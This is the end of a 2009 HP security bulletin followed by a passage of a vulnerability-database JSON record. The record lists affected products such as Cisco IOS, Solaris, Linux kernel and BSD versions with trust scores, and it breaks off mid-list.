    Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux)

    iEYEARECAAYFAksEDAMACgkQ4B86/C0qfVm87gCgliWdpIKldzOKHRvJA5r9gR4Z ge0AoMu3ueCbIB4y3HUmT/jReUzE4jym =uBei -----END PGP SIGNATURE-----

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "cisco",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "cisco",
            "version": "12.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "cisco",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "cisco",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "cisco",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "oracle",
            "version": "10"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "oracle",
            "version": "8"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "oracle",
            "version": "9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.0\\(9\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc2b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.2xv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.1xx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.1xv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.4xv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.3xx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.0xv"
          },
          {
            "_id": null,
            "model": "catos 8.4 glx",
            "scope": null,
            "trust": 1.2,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios xe",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "rtx1100",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "ios xe",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "rtx1500",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rtx2000",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt57i",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "rtv700",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt300i",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "rtx1000",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt250i",
            "scope": null,
            "trust": 1.1,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2bc"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)sx"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9a\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xk2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(22\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yi3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yk2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xm4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)sl4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.23"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12.05\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)ja1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(15\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xj"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xf"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xc"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1da"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xk2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.48"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)ew"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)db1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(18\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)eo1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(27b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)b"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sec2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.14"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1ct"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)ja5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)ex4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)sp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xk"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)s5a"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xv3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(9\\)s8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)ea1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(9\\)p"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.34"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ey3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.24"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10.5\\)ec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(4\\)xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yf2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1az"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya11"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.21.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)st7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xs"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xi1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xl"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.53"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xk2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2\\)xc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)ys"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)mb13b"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xf1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3na"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5e\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.43"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)bc1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10\\)s8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sed"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(23\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)mc1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(13\\)ca"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(2\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)ec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xb3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ja1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(27\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)yw3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.55"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.41"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3a\\)xi8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ea2a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7.7\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(25\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ew"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(10\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2pi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)jk"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.23"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(13a\\)bc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)e5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yf2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5a\\)b"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(1a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12m\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zj"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.22"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)sl9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.43"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.40"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)db2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)xr4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.39"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(12\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xs"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)xy6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)ya1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11\\)ea1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13.03\\)b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2f"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xk"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xk3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.19.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.30"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12\\)da3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.52"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)ew"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xk1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(2b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(26\\)p2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.34.1"
          },
          {
            "_id": null,
